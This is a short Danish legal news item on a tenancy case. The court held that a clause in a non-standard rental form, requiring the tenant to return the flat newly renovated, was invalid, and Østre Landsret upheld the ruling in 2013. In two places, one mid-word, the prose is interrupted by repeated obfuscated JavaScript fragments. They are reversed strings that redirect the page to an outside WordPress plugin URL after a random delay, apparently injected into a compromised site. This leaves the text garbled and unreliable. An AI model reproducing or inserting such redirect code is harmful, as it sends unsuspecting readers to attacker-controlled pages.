Formular til brug ved udlejning af boliglejemål

Vilkår i lejekontrakt, der ikke var i overensstemmelse med den standardiserede typeformular for boliglejemål, som pålagde lejeren større forpligtelser end i henhold til lejeloven var ugyldig.

En udlejer indgik med en lejer en lejekontrakt om leje af et boliglejemål. Lejekontrakten var ikke benævnt ”Typeformular A, 8. udgave” på side 1, som det ellers fremgår i den standardiserede blanket for boliglejemål. Herudover var der før § 11 i lejekontrakten ikke medtaget den tekst, der normalt fremgår af den standardiserede blanket, som gør opmærksom på, at vilkår i § 11 kan fravige lejelovens almindelige regler, og give lejeren færre rettigheder eller større forpligtelser end efter lejelovens almindelige regler.

Bortset fra disse toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to fravigelser var lejekontrakten identisk med den standardiserede blanket.

I lejekontraktens § 11 var det bestemt, at lejemålet blev overtaget nyistandsat, og ved fraflytning skulle lejemålet afleveres nyistandsat for lejerens regning.

Byretten og Landsretten nåede frem til, at der var anvendt en uautoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toriseret blanket og at vilkår, der pålagde lejeren større forpligtelser end lejelovens almindelige regler var ugyldig. Retterne påpegede i denne forbindelse, at pligten til den indvendige vedligeholdelse efter lejelovens § 19, stk. 2 som udgangspunkt påhviler udlejer.

Byrettens dom blev stadfæstet i Østre Landsret i april 2013.